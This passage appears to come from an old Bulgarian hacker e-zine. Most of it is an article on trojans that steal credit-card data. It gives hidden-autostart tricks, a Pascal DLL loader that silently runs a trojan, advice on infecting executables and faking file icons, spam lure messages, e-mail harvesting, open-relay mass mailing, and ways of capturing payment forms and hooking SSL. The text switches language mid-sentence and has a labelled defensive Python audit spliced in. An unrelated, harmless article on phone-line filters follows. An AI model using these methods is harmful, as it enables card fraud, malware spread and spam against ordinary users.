 e  otnovo avtomatichno izpulnenie na troianeca. Triabva da se otbelezhi, che
 nai-podhodiashtite  direktorii, v koito triabva da se instalirat troianskite
 kone  -  "WINDOWS\SYSTEM\".  V  tozi  sluchai  nikude  v  programata, nito v
 registry-to,  ne triabva da se zadavat putishta do failovete na konia. Osven
 tova v tezi direktori vinagi ima ogromno kolichestvo failove i veroiatnostta
 potrebiteliat  da  se osumni, che niakoi ot tiah e troianec, e tvurde malka.
 Ima  i  drugi  kliuchove  v  registry-to,  koito  mogat  da  se izpolzvat za
 avtomatichno startirane na programi pri zarezhdane na operacionnata sistema.
 Ima  e edin fail s ime "WINSTART.BAT", koito se izpulniava pri zarezhdane na
 WINDOWS.  Mozhem  da  slozhim  nashiat  kon  i  napravo v StartUp grupata na
 Start Menu-to, no tova e tvurde naivno. Vsichkite posocheni dosega metodi sa
 neefektivni,  zashtoto  dazhe  nai-obiknoveniat potrebitel mozhe da razbere,
 che sistemata zarezhda niakakuv troianec avtomatichno. Tova mozhe da stane s
 razlichni  programki,  vkliuchitelno  i  s  MsConfig  i  DrWatson,  koito sa
 standartna  chast  ot  Windows  98. Eto zashto triabva da zarezhdame nashiat
 troianski  kon  po  po-hitur  i  nezabelezhim  nachin. V niakoi kliuchove ot
 registry-to,  kakto i v niakoi sekcii na konfiguracionnite failove WIN.INI i
 SYSTEM.INI  ima  vuzmozhnost  za  zarezhdane na razlichni draiveri i .DLL-i.
 Mozhem  da  napravim  programka za zarezhdane na konia, koiato predstavliava
 draiver ili .DLL i da ia instalirame na niakoe ot posochenite mesta. Ako puk
 nashiat troianec e .VXD draiver, mozhem prosto da go kopirame s podhodiashto
 ime  v sistemnata direktoria na WINDOWS i toi shte se pusne ot operacionnata
 sistema.  Ako  celiat nash troianec niama .EXE fail, a e prosto .DLL, mozhem
 sushto  da  go  zaredim ot niakude nezabeliazano. Shte dadem edin primer kak
 stava  tova.  Neka  imame  faila  ADVAPI.DLL,  koito  se  poluchava  ot sled
 kompilirane na slednata programka:

 LIBRARY ADVAPI;
 USES WinTypes, WinProcs;
 BEGIN WinEXEC('TROJAN_HORSE.EXE',SW_HIDE); END.

 Imeto  na  faila  e specialno podbrano, za zabluda na protivnika. Dobre e da
 slagame   imena,  koito  sa  shodni  sus  sistemnite  failove  i  moduli  na
 operacionnata sistema. Ako dobavim v sekciata [BOOT] na faila SYSTEM.INI

        DRIVERS = ADVAPI.DLL

 ADVAPI.DLL  shte  se  zarezhda  avtomatichno  oshte  predi  zarezhdaneto  na
 Desktop-a  i  Shell-a  na  WINDOWS  (Windows Explorer). I ponezhe ADVAPI.DLL
 puska  nashiat  troianec, toi vinagi shte se zarezhda ot WINDOWS i to suvsem
 skrito.
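
 Added example (not part of the original article and not the author's code):
 a defender-side audit, in Python, of the autostart locations this section
 names: run= in [windows] of WIN.INI, shell= and drivers= in [boot] of
 SYSTEM.INI, and HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.
 The sample file contents, the Run values and the baseline lists are
 constructed assumptions; a real baseline comes from a known-clean install.

```python
"""Audit the Win9x autostart locations named in the article (added example)."""

# ASSUMED baselines for illustration only; record the real ones from a
# known-clean installation of the same Windows version.
BASELINE_SHELL = "explorer.exe"
BASELINE_DRIVERS = {"mmsystem.dll", "power.drv"}
BASELINE_RUN_VALUES = {"systemtray": "systray.exe"}

RUN_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

# Constructed sample inputs, using the file names that appear in the article.
SAMPLE_WIN_INI = "; constructed sample\n[windows]\nrun=trojan_horse.exe\n"
SAMPLE_SYSTEM_INI = (
    "[boot]\n"
    "shell=explorer.exe troianec.exe\n"
    "drivers=mmsystem.dll power.drv ADVAPI.DLL\n"
    "\n"
    "[386Enh]\n"
    "device=*vshare\n"
    "device=*vcd\n"
)
SAMPLE_RUN = {"SystemTray": "SysTray.Exe", "Loader": "trojan_horse.exe"}


def parse_ini(text):
    """Parse legacy INI text into {section: [(key, value), ...]}.

    Keys may repeat inside a section (SYSTEM.INI does this with device=),
    so values are kept in a list. Section and key names are lower-cased;
    a line starting with ';' is a comment.
    """
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, [])
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current].append((key.strip().lower(), value.strip()))
    return sections


def values(sections, section, key):
    """Return every value stored under section/key (possibly several)."""
    return [v for k, v in sections.get(section, []) if k == key]


def audit_win_ini(text):
    """Any non-empty run= in [windows] starts a program at every boot."""
    return [("WIN.INI [windows] run", v)
            for v in values(parse_ini(text), "windows", "run") if v]


def audit_system_ini(text):
    """Flag a shell= line that is not the bare shell, and unknown drivers=."""
    findings = []
    sections = parse_ini(text)
    for v in values(sections, "boot", "shell"):
        if v.lower() != BASELINE_SHELL:
            findings.append(("SYSTEM.INI [boot] shell", v))
    for v in values(sections, "boot", "drivers"):
        for name in v.split():
            if name.lower() not in BASELINE_DRIVERS:
                findings.append(("SYSTEM.INI [boot] drivers", name))
    return findings


def audit_run_key(run_values):
    """Flag Run values absent from the baseline; note entries with no path."""
    findings = []
    for name, cmd in run_values.items():
        if BASELINE_RUN_VALUES.get(name.lower()) != cmd.lower():
            note = " (no path given)" if "\\" not in cmd else ""
            findings.append((RUN_KEY, f"{name}={cmd}{note}"))
    return findings


def audit_all(win_ini, system_ini, run_values):
    """Run all three checks and return one combined list of findings."""
    return (audit_win_ini(win_ini) + audit_system_ini(system_ini)
            + audit_run_key(run_values))


if __name__ == "__main__":
    for location, value in audit_all(SAMPLE_WIN_INI, SAMPLE_SYSTEM_INI, SAMPLE_RUN):
        print(f"{location}: {value}")
```

 On a live system the two INI files are read from the Windows directory and
 the Run values are exported from the registry before being passed in.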

 Vnimanie: Ne dopuskaite bug-ove v troianskite kone! Te mogat da vi razkriat.
 Sluchvalo  se  e  poradi  greshki  v  programnia  kod  na  kone da se zabavi
 znachitelno  operacionnata  sistema, da stane nevuzmozhno Shut-Down-vaneto i
 ili  puk  po  vreme na rabota da dava General Exception Fault ili WINDOWS da
 blokira,  koeto  nikak  ne e priatno. Zatova vinagi testvaite troianskite si
 kone  na  razlichni kompiutri i operacionni sistemi, rabotete produlzhitelno
 vreme  s  troianci  v  pametta  i  t.n., za da ste sigurni, che v tiah niama
 greshki.

 Drug  hitur  metod  za  skrivane  na  troianec  e  da zarazite s nego niakoi
 izpulnim  fail  (.EXE  ili  .DLL). Ideiata e da smenite imeto na originalnia
 fail,  da  zapishete troianeca na negovo miasto s negovoto ime, a pri vikane
 na  troianeca da vikate originalnia fail. Po tozi nachin potrebiteliat niama
 da razbere nishto, a vseki put, kogato toi izpolzva zarazeniat fail, shte se
 izpulniava  i  vashiat  troianec. Mozhete da zarazite niakoi ot failovete na
 Dial-Up  Networking-a ili Internet Explorer ili niakoi ot sistemnite failove
 na  WINDOWS.  Osnoven  problem  pri  tozi  podhod  e, che kogato edin fail e
 aktiven  v  pametta, toi ne mozhe da bude prezapisan. Eto zashto ili triabva
 da  zaraziavate neaktivni v pametta failove ili triabva da gi zaraziavate po
 specialen  nachin,  naprimer  chrez  malka  programka-zarazitel,  koiato  se
 izpulniava  pri  zarezhdaneto  na  WINDOWS.  Mozhete  da  izpolzvate i faila
 WINSTART.BAT, koito se izpulniava pri vsiako startirane na WINDOWS.

 Otnosno skrivaneto ima i oshte neshto. Povecheto komponenti na operacionnata
 sistema   imat   specialen   resurs,  narechen  VERSION_INFO.  Toi  sudurzha
 informacia  otnosno  prizvoditelia  na  faila,  ot kakvo e chast toi, suvsem
 kratko  opisanie  i  nomer  na versiata. Dobre e i v konete koito pishete da
 slagate  takiva  resursi.  Mozhete  da  gi  suzdadete  s razlichni programi,
 naprimer  s  Borland  Resource  Workshop.  Osven  tova  niakoi programi imat
 specifichni  ikoni.  Interesno  se poluchava, kogato slozhite ikonka na .ZIP
 fail  kato  ikonka  za  .EXE  faila,  koito instalira vashia troianec. Mnogo
 potrebiteli  se  zabluzhdavat,  che  tozi  fail  e .ZIP arhiv i go otvariat.
 Estestveno  e vashata programka da dade niakakva greshka sled kato instalira
 konia  i  v  tozi  sluchai  potrebiteliat  izobshto da ne razbere kakvo se e
 sluchilo.

 Eto che stigniahme do sledvashtiat vupros - za razprostranenieto na konia za
 karti. Ochevidno kolkoto poveche hora imat aktiven troianskia kon za karti v
 pametta  na  kompiutura si, tolkova poveche kreditni karti shte poluchavate.
 Eto zashto koniat triabva da se razprostrani po mnogo kompiutri, i nai-veche
 po  takiva,  koito  se  izpolzvat za elektronni razplashtania (pazaruvane po
 INTERNET).  Osven  tova  triabva  da  se  zaraziat  nai-veche kompiutrite na
 obiknovenite  potrebiteli, zashtoto edin dobur kompiuturen specialist nikoga
 niama  da  dopusne da se zarazi s troianski kon. Naprotiv, mnogo e veroiatno
 koniat  da  bude  izpraten  do  sluzhbite  za borba s kompiuturnite virusi i
 suvsem  skoro  da  izleze antivirusna programa sreshtu nego. Niakoi ot moite
 troianki  kone  naprimer se chistiat ot F-PROT i AVP. Vupreki, che niama kak
 da  razberem koi shte poluchi nashiat troianki kon, ako go razprostraniavame
 sus SPAM ili po drug nachin na sluchaini hora, vse pak mozhem da predpriemem
 niakakvi   merki,   s  koito  da  ogranichim  "zaribiavaneto"  na  po-umnite
 potrebiteli.  Edin  osnoven nachin za razprostranenie e masovoto izprashtane
 po  poshtata.  Mozhem  da  suberem  malko  e-mail adresi i da im izpratim po
 niakoe pismo sus slednoto sudurzhanie, naprimer:

     "Hi, do you remember me? I am Elena. I send you my photo".

     ili

     "Hi. Look at the file we talked about. Peter".

 i  razbira  se dobaviame troianskia kon kum pismoto. Dosta e veroiatno da go
 pusnat. Dobre e koniat da dava niakakva greshka pri otvarianeto na faila, za
 da  se  zabludi  neopitnia  potrebitel.  Drug nachin za razprostranenie e da
 slozhim  konia v niakoia hubava programka na niakoia stranica i da spam-vame
 po  e-mail  ili  v IRC (koeto e mnogo intersno). Naprimer mozhem da vlezem v
 kanala  #mp3  i  da  kazhem,  che  predlagame  novia  album na niakoia grupa
 bezplatno, kato dadem stranicata s konia. V tozi sluchai e dobre koniat da e
 .EXE,  no  s  ikonka na .MP3 fail. Oshte po-dobra ideia e da spam-vame za da
 imame  posshtenie  na  nashata stranica ili prosto da ia reklamirame kato si
 platim  niakude  za  celta  s  kreditna  karta, da ia slozhim dosta luzhlivi
 neshta  za  download,  koito  razbira  se  sa  ili  troianci,  ili  niakakvi
 troianizirani  programki. Mozhem da napishem dazhe niakakva ActiveX kontrola
 s  troianec v neia i ako potrebiteliat izpolzva Microsoft Internet Explorer,
 mozhe  da  se  zarazi  dazhe  i  bez  da razbere ili samo kato se suglasi da
 izdurpa  "neobhodimata  za rabota" ActiveX kontrola. Osven tova mozhem da se
 vuzpolzvame   ot  obshtoizvestnite  bugove  v  Internet  Explorer,  naprimer
 vuzmozhnostta za pisane v lokalnia hard-disk i po registry-to.

 Vse  pak  edin  ot  nai-efektivnite  nachini za momenta e "zaribiavaneto" po
 e-mail.  Za  da  zaribiavate  po  elektronnatata  poshta, obache vi triabvat
 goliamo  kolichestvo  adresi. Edin ot nachinite za sdobivane s e-mail-i e da
 si  napishite  skript,  koito tursi v niakoia mashina za tursene na adresi v
 INTERNET,  kato  naprimer  http://www.switchboard.com.  Drug nachin, koito e
 dosta  po-lesen  e da otidete v podhodiashta mashina za tursene v INTERNET i
 da dadete niakakva zaiavka ot tipa na:

        "@hotmail.com" + "@yahoo.com" + "@mailcity.com" + "@usa.net"

 Mozhete  da  dobavite  kum  zaiavkata  i  izrazite  "e-mail  directory"  ili
 "guestbook"  i  shte poluchite edin mnogo goliam spisuk ot stranici, v koito
 ima  desetki,  stotici,  a poniakoga dori hiliadi e-mail adresi na sluchaini
 hora.  Dostatuchno  e  da  si  zapishete  vsichkite  tezi  stranici  v  edna
 direktoria  i  sled  kato  suberete  dostatuchno  kolichestvo  megabaiti sus
 stranici  s e-mail-i, da si napishte edna programka, koiato izvazhda ot HTML
 ili  tekstovi  dokumenti  validnite  e-mail  adresi. Mozhete da si izmislite
 niakakuv  sintaksis,  po koito da razpoznavate e-mail-ite v teksta. Naprimer
 vseki  e-mail  ima  formata  <ime>@<survur>.<survur>.....<domein>.  Ot svoia
 strana  <ime>  mozhe da e suvkupnost ot bukvi, cifri i niakoi drugi simvoli,
 <survur>  e  suvkupnost  ot  latinski  bukvi  i  cifri, a <domain> e 2 ili 3
 latinski  bukvi.  Osven  programkata  za  izvazhdane  na  e-mail-i,  shte vi
 triabvat i oshte niakolko programki, naprimer za sortirane na e-mail-ite, za
 premahvane  na  ednakvite,  za  razburkvane  v  proizvolen  red  i t.n. Tezi
 programki  sa  prosti  i  mozhete  sami  da si gi napishete. Shte vi triabva
 zadulzhitelno   i  programa  za  prashtane  na  e-mail,  zashtoto  povecheto
 standartni programi za izprashtane na e-mail ne skrivat poluchatelite. Osven
 tova  izprashtaneto na 100 000 konia po celia sviat nikak ne e lesna rabota!
 Triabva  vi burza i kachestvena INTERNET vruzka. Triabva vi hubava programka
 za  prashtane  na e-mail, koiato raboti paralelno, zashtoto povecheto e-mail
 klienti  izprashtat  pismata  edno  po-edno  kato izpolzvat nai-mnogo 10% ot
 kapaciteta  na  vruzkata.  Tova  se  dulzhi  na  protokola za izprashtane na
 poshta.  Mozhete  da izpolzvate Star Gruhtar Mass Mailer ili da si napishete
 sobstvena e-mail razprashtachka. Dosta dobra ideia e sushto da se prashta ot
 Shell-account  ili  ot  niakakva  UNIX/LINUX  mashina.  Povecheto softuer za
 poshta  pod  UNIX  sistemite (kato SendMail i QMail) raboti mnogo efektivno.
 Drug problem e prez koi SMTP server da se prashta. Nai-dobre e da se prashta
 prez  niakolko  moshtni publichni (priemashti poshta ot vseki za vseki) SMTP
 server-i.   Takiva   survuri   mozhem   da   otkriem   sus  skaner  za  SMTP
 mail-server-i  ili  ot  niakoi spisuk v INTERNET. Pri izprashtane na goliamo
 kolichestvo   poshta  mozhe  da  se  sluchi  ako  izpolzvaniat  survur  ne s
 dostatuchno  burza  vruzka  ili  e  mnogo natovaren, pismata da se izpratiat
 uspeshno,  no  da  ne  pristignat.  Tova  vazhi osobeno silno ako koniat e s
 goliam  razmer.  Zatova  triabva  da  se izpolzvat mnogo survuri. Osven tova
 administratorite na survurite sushto mogat da zabraniat poshtata. Eto zashto
 kogato  spam-vate  triabva  da  slagate niakoi vash e-mail ot vreme na vreme
 sred  golemia  spisuk  za  da  proveriavate  dali  pismata  se poluchavat ot
 "vashite klienti".

 Cialata  sistema  za dobivane na kreditni karti chrez troianski kone, koiato
 opisahme  do  tozi  moment  ima  i  niakoi  nedostatuci.  Naprimer  mozhe da
 poluchite  edna  i  sushta  karta mnogo puti. Tozi problem mozhe da se reshi
 kato  troianskiat kon si pravi spisuk ot veche izpratenite karti, no tova ne
 e  mnogo  dobre da stava, zashtoto ima oshte edin mnogo po-strashen problem.
 Mnogo  chesto  (v  poveche  ot 70% ot pismata) se poluchavat karti s nepulna
 informacia.  Tova  se dulzhi na razlichni prichini kato naprimer: Magazinut,
 kudeto e pazaruval "klientut" iziskva samo nomer na kartata ili samo nomer i
 exp.date, koeto suvsem ne e dostatuchno na povecheto mesta. V niakoi sluchai
 "klientut"  si  vuvezhda  imeto  i adresa na edna stranica, a plashtaneto se
 is carried out on another one, where only the card number and the expiry
 date are entered. Since our trojan horse captures only the active page, it
 misses important information: the name and address. This problem can be
 solved by sending not only the data from the page with the card but also
 the data from the previous page. Even that is not easy, though. A user
 often clicks the mouse many times while filling in the card form. If the
 card fisher sends one e-mail per click, some messages arrive many times
 over, filled in to different degrees. A good way to avoid this effect is to
 send the message only once the current window no longer contains a valid
 card number after having contained one a moment earlier. That way we can be
 sure we send only the fully completed card form and not the intermediate
 data from while it was being filled in. In this case, however, there will
 be a problem if the "client" switches between different windows, but that
 too can be anticipated. It is also good to record the URL if the form is
 somewhere on the WEB. The data is often filled in not with digits but with
 other controls, for example RadioButtons and CheckBoxes. Capturing then
 becomes harder and fishers often miss part of the information. One way out
 of this situation is to send the whole page as a picture, but that is not
 recommended, because the messages will be large and the information will be
 hard to extract from them. In one practical case, at the start, after
 30 000 people had been baited by e-mail, on some days more than 200
 messages were arriving. Think what would happen if each one were 50-100 KB.
 And what if you cannot download your "harvest" every day... Another idea
 is, on every mouse click or press of [Enter], to write the information from
 the current and previous pages to a file together with the labels of the
 input fields, and to send the file at the moment it becomes largest. That
 way the maximum amount of information is captured.

 Another very basic shortcoming of the card fisher described in this article
 is that it does not work under some versions of Internet Explorer (4.0 and
 5.0). This is because these web browsers do not use the standard WINDOWS
 controls but only ActiveX controls. This means the card is not contained in
 a text field but in some ActiveX control. Work on this is under way, and
 some card fishers for Internet Explorer have already appeared that use IE's
 COM interfaces and pull the needed information out of the form. Moreover,
 IE supports a special event, OnBeforeNavigate, which is called when the
 form is already completely filled in and the user confirms it. If this
 event is captured, many of the problems are solved easily and reliably,
 tracking the mouse and keyboard is no longer needed, and so on.

 Another clever and interesting way of fishing for cards is to hook the web
 browser module that takes care of sending encrypted information. This
 concerns the HTTPS protocol, which uses SSL (Secure Socket Layer) to send
 encrypted information. How SSL is implemented and how it works is not
 important; what matters is that the module that supports it (usually some
 DLL) receives, in normal unencrypted form, the information that has to be
 sent encrypted. This information usually looks like:

 "https://www.shop.com/order.cgi?NAME=familia&SURNAME=ime&CARDTYPE=tip&CC=nomer&EXP=data...".

 This string is all we need. The browser generates it from the completed
 form and passes it as a parameter to the module for encrypted sending over
 the HTTPS protocol. If we infect or modify this module, we can solve all
 our problems properly. Unfortunately this idea has not yet been studied in
 depth, and we cannot say anything more specific on the matter.

 So far we have looked at what card horses are, how they are written and how
 they are spread. Let us also look at how we can protect ourselves from
 becoming the victim of a trojan horse that has somehow landed on our
 computer. The surest method is never, under any circumstances, to enter our
 card number into the computer. Usually we can send it by fax or some other
 way, but not by computer. Note that the horses described in this article
 extract credit cards even though they travel encrypted over the INTERNET
 (via the HTTPS connection protocol, through Secure Socket Layer). Our
 horses do not eavesdrop on network traffic and do not break into banks and
 shops. They eavesdrop on the "client's" machine. The second thing, which
 applies not only to card fishers but to horses in general, is to check our
 active processes from time to time and remove the unnecessary ones. We can
 establish the presence of a trojan horse very easily with the DrWatson
 program in Windows 98. It gives very rich information about the loaded
 processes, modules and drivers, as well as about the installed system
 HOOKs. That is why, if we see that some suspicious process has installed a
 system HOOK, we must examine it carefully and, if we establish that it is
 not part of the software installed on the computer, remove it. Most
 Cyrillization programs hook the system keyboard HOOKs, so be careful. Of
 course, the absence of HOOKs does not guarantee that we have no horse. We
 must not forget that the ingenuity of programmers and hackers is boundless
 and that they can do incredible things to hack you and to hide. Another
 monitoring method, which is considerably harder, is to watch your INTERNET
 traffic: whether messages are being sent that were not sent by you, or
 whether something is sometimes sent over the network that should not be
 sent at that moment. Besides that, you should watch carefully whether the
 system behaves strangely (slowing down, hanging, or the hard disk grinding
 constantly /this is how some keyboard-logging programs get caught/, etc.).
 Be careful when you install software indiscriminately, especially if it was
 downloaded from the INTERNET. Never run programs you have obtained as a
 result of spam! Another good, if unpleasant, strategy is to wipe your
 WINDOWS from time to time and reinstall it together with only the programs
 you need. As we know, this is no problem, since WINDOWS as a rule breaks
 down every few months and reinstalling it becomes necessary anyway.

 In conclusion, it could be said that card fishers are a very powerful and
 effective means of obtaining information about other people's credit cards.
 They can be written in different ways and work on different principles, but
 the effect is one and the same: in the end your credit card gets stolen.
 The fight against them is very hard, but inexperienced users are
 nevertheless the more vulnerable. The problem is not in the hackers and
 programmers who obtain other people's credit cards, but in the payment
 systems that have become established nowadays.

   [Ed. note: DAMN THAT PASCAL GUY]
 
 >> EOA <<

 -·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·#16·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-
  [ a r t i c l e ]                                         [ a u t h o r ]
  Phone Line Filters                                                  Kuche 
 -·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-

 This article is a supplement to the one by Stoiko & 1/2, even though the
 original version came out about 4 times longer. Most of the schematics and
 ideas are taken from the ~net, but there are also ideas of my own (treat
 them with great distrust). I apologize in advance if the article looks
 lame, but some of these things were unknown even to fairly experienced
 people. !!!It is POSSIBLE that I repeat Stoiko & 1/2 - it is not
 deliberate, I am just trying to make the text reasonably complete and
 thorough!!!!

 1. Before the modem. The condition of the wiring from the duplex box (if
 there is one; if not, from the wire in your home) to the modem is entirely
 in your hands. There is not much to do with the duplex box, because it is
 sealed (if it is not, the only thing you can do is sand the contact points
 of the relays). The wire, from the point where you can replace it, is best
 made UTP (at least in the sense of an unshielded twisted pair) - this of
 course does not mean you have to rip out the old one.

 Usually the wire that reaches the 'socket' in the wall is as it should be
 and does not need to be modified. From the wall to the modem, however, it
 is best to twist one yourself (I remember the phone technician who, when
 installing our MTG, spent 1 hour twisting 2 metres of wire - that was
 definitely no accident). Btw, for those who do not know, MTG is a
 microtelephone set (mikrotelefonna garnitura) - !!! I wonder what a macro
 telephone set would be!!! - a telephone set. I write it that way because it
 is shorter. There really is a difference between the guy's hand-twisted
 wire and the wire that came with my modem. The other point is the joints
 between wires - the most reliable is with a soldering iron, but it is also
 the most crude.

 Further along the way to the modem comes the MTG in question. It is best if
 it is plugged into the modem socket marked "PHONE", but it does not have to
 be exactly that way, because:

 first - some telephones (mine, for example - for reference the machine is a
 BTC one, and I hauled it off from the BTK together with a terminal that a
 friend (or a looot of friends) and I never managed to get working - so I am
 convinced it is not some junk but a solid MTG....) have an amplifier (not a
 speakerphone), a similar one is discussed further on, which adds a certain
 stability to the connection;

 second - imagine you have more than 1 telephone and your PC is far from
 them, what then? Will you buy 100 m of wire? (for the telephones at least
 there is no need to twist it).

 (Note by Iron - 100 m of UTP Cat.5 (although Cat.3 is probably enough for a
 phone) costs about $25... That is not all that expensive, given that this
 is 4 pairs :-)

 The solution is to connect a dynistor in series with each telephone, for
 example a KH102A - it is Russian and the H is an N. :)), oriented the
 proper way (if (+)-T-D-(-) does not work, try it reversed, (-)-T-D-(+)).
 (For reference, the dynistor has 2 leads; you cut one of the telephone's
 wires and connect it there. It can also be tucked inside the telephone
 itself, but mind its plug :) ). If you still cannot find a KH102A, you can
 replace it with the little circuit shown at the very bottom of the text,
 where the transistors are 2T3850C and 2T3606C respectively and the resistor
 is 91 kilohms. That is more or less (give or take) it for the wires and
 telephones.....

 2. The finer points of the modem. Here we naturally arrive at a dilemma -
 the ADC of the modem in question. On terribly bad lines the modem heats up
 like a stove, because the ADC regularly receives doses of high voltage from
 the line (well, not so high as to blow it, although I have heard of such
 cases too), which can be cut down with two small resistors of about 100-200
 ohms connected in series in the two wires of the modem (two of 100, not one
 of 200), which however also leads to a worse connection (but the modem will
 stay in one piece :) ).

 Now, some modems (mainly 56k) have a little command, ATI11, which shows
 statistics for the last connection made. In it you can see the usual things
 as well as the level of the transmitted and received signal, near and far
 echo ( :-) ) and the average noise level.

 (Note by Iron - Leased-line modems have it too)

 What stands out is the transmit signal level, which on some modems can be
 adjusted via register N91 (ATS91? ; ATS91=x&W0 - for lamers), and can be
 from 6 to 15 (-dBm), with about 8 being best. Unfortunately this works only
 on some modems, even though all of them answer OK. If the register really
 has changed afterwards, the part about amplifiers is not for you.

 Another fine point of modem setup is register N10 (well, whoever knows it,
 go read what it says at the beginning of the article), which sets the
 number of 1/10 sec. the modem waits before it drops if there is no carrier
 (Ed. note: actually I find it a bit strange that he wrote N10, since on all
 the modems I have seen it is S10). (Note by Iron - yeah, it is S10 all
 right...) It is best for it to be in the order of 200-250. (speaking of
 drops, I remembered that some modems drop when the ADC is overloaded)...

 3. The filters - which is what made me write all of the above (when I saw
 the articles that will most likely be published in PHM21, I came across the
 one by Stoiko & 1/2 about a filter, and since I needed such a thing myself,
 I decided to write this article, but as it turned out, naturally it was the
 small pebbles (points 1 and 2) that tipped my modem :)). If after the above
 you still need a filter and an amplifier, read on; otherwise you are fine
 as you are.

 The schematics are taken from FIDO and mainly .ru sites; there is also one
 implementation of my own (guess which). I apologize in advance for the
 ASCII graphics, but it would be brutal to UUencode and put some 50+ KB of
 pictures here. When testing, it is best to also try swapping the polarity
 of the input. All capacitors are at least 200 W, the resistors 1/2 watt.
 Almost all the filters aim to filter out high frequencies (for example from
 your PC's fan, which are picked up inductively) - for instance, it is
 noticeable that the capacitors are mostly 0.15 uF. For the more special
 circuits an explanation is also given.

 Filter No2 has been tried on an ActionTec V90 and an Acorp 336EMR and an
 analogue telephone exchange (ATC). The bad part is that these filters are
 for high-frequency signals, so there is no remedy for the clicking of the
 relays. You could of course put a coil towards the modem, but the effect
 will be the same, and at most you will blow up the exchange and be left
 without telephones that are miserable anyway. My attempts at such a filter
 led only to a blocked telephone..

 As EXo said, "When I chain them all together and end up with a mess, who do
 I swear at?" - nobody, because they must be connected only one at a time,
 possibly together with the amplifier. Even so, No2 held steady with my
 little modem, and after it came No4.

 Here are the schematics:

  o--/\/\/\---o---/\/\/\--o
       L1     |     L1          L1 = 10 turns, PEL wire 0.1 mm in diameter,
             ---                     winding radius 3 mm - 2 pieces
  In      C1 ---      Out       C1 = 0.15 uF
              |
              |                   Cuts off the high-frequency signals.
  o-----------o-----------o

 - = - - = - - = - - = - - = - - = - - = - - = - - = - - = - - = - - = - - -

  o----###---o --->|------o
       R1    |    D1              R1 = 360 ohms
            ---                   C1 = 0.15 uF
  In        --- C1    Out         D1 = D226
       R1    |    D1
  o----###---o----|<------o       This is perhaps the best filter.

 - = - - = - - = - - = - - = - - = - - = - - = - - = - - = - - = - - = - - -

  o             In                 o
  |     C1     R1     R2    R3     |  C1=1.2 uF, R1, R2 - potentiometers!!
  |-----||----###----###----###----|  R1=10 kilohms R2 = 2 kilohms R3=100 ohms
  |          '-/    '-/            |  R1 and R2 are used for tuning
  o             Out                o  (start from max. resistance and
                                      decrease it gradually)
                                      What is special about this filter is
                                      that it does not filter out the higher
                                      and lower frequencies but passes the
                                      signal (incl. the carriers) through
                                      R1,2,3. From which, I assume, you can
                                      draw the appropriate conclusions (you
                                      can even blow up your exchange).


 - = - - = - - = - - = - - = - - = - - = - - = - - = - - = - - = - - = - - -


  o-----------o-------o----------o        Damn this ASCII to hell
              |       #                   ( x - no connection)
             ---    R3#
   In      C1---      # Out(what else)    C1=.5uF
              |       |                   C2=100nF
    |---####--o--####-x--------|          R1=100 ohms
    |    R1         R1|        |          R3=5.6K
  o-o----------||----o-||-----o-o
               C2       C2

 - = - - = - - = - - = - - = - - = - - = - - = - - = - - = - - = - - = - - -

 Here follows a variant with transformers - ADVANCED USERS ONLY (I have not
 even tried it). RC denotes a capacitor and a resistor connected in
 parallel. * marks the sym. inputs of the transf.

      * Tr11          Tr21 *
  o---\/\/\/---RC----\/\/\/---o          |-||--|
  In  ======         ======  Out   RC = -o     o-
  o---/\/\/\---RC----/\/\/\---o          |-###-|
     *  Tr12         * Tr22

 C=.1 uF
 R=10 - 60 ohms, and reportedly it depends on the dist. to the exchange (do
 I really have to explain to you that this is done with a potentiometer :))
 Tr21,Tr22 = 30-50 turns, again side by side.

 For the Tr's, PEL wire with a diameter of .4 .5 mm is used (PEL04, for
 example). They are wound on a ferrite cylinder, symmetrically for Tr1 and
 asymmetrically for Tr2. Tr11,Tr12 = 7 turns side by side!

 In this model Tr1 is a filter for the highs, while Tr2 counts as a passive
 amplifier.

 - = - - = - - = - - = - - = - - = - - = - - = - - = - - = - - = - - = - - -

 So much for the filters; I think these are enough (I wore myself out with
 the ASCII (for the 10th time), and the amplifiers need ASCII too :(( ).

 4. The gem - amplifier - 1 piece (originally there were two, but I figured
 it was better not to put the second one here because it is cruuuddier than
 this one, and it also has a 60 V supply, and the only difference is that it
 has a transistor instead of the op-amp. And then there is the ASCII..). It
 is connected in parallel with the modem and is switched off when not in
 use, because it puts noise on the line. It amplifies by about 1-2 times.
 Here is the schematic; in it the 555UD2 can be replaced with any amplifier.
 The circuit requires a symmetric supply of +/- 15 V:

                               L1  ______ R1  /--|
  |------o---o-----------o---------/\/\/\----###-o-,   D1 - Zener 20 V
  |      |   |           |    i(5)                 |   R1=22k R3=160  |
  |     ---  #           '--------|'.     o(10)    |   R2=33k R4=1.6k |ohms
  |  D1  ^   #  R2          /i(4) |ou,'------------o   L1=200-400 uH - any will do
  |     / \  #            --------|,' |            |   C1=0,043 uF
  |      T   |            |        |  |            |   C2=180 nF
  |      '---o--->GND     |     (3)|  |(12)        |   C3=4 uF
  |  D1        R3         |        '||'            |   C4=20 uF 20V (POLARIZED)
  o--|<---o---####--------o          C2            |
  |       |               |                        |
  |       |               |                        |
  |       |               |      R4                |
  ---    ---              '---o-###-o--------------'
  --- C3 --- C3               '-||--'
  |       |                     C1          The numbers in brackets are the
  |       |   C4                            op-amp pins. +15V -> pin 11; -15V -> pin 6
  |        o---||--->GND                    R1 sets the gain
  |       |     +
  |Lineee |                                 Op-amp=555UD2

 With this variant the tuning goes as follows: with the handset of the MTG
 lifted, R1 is turned all the way down and you check whether there is a
 signal at the output (pin 10) - best done with an oscilloscope. R1 is
 gradually increased until the signal disappears, and then it is increased
 by another 15% on top. (If you do not have an oscilloscope, this is done by
 connecting one more telephone and listening there.) I will not write about
 the power supply because I would freak out from so many ASCII pseudo~
 things; it is not a problem anyway.
            ,----------,
        T1  |          | T2
  (A)---(E)(B)(C)--(B)(C)(E)---(K)  - This is the replacement circuit for the dynistor.
            |          |
            '--####----'
                R

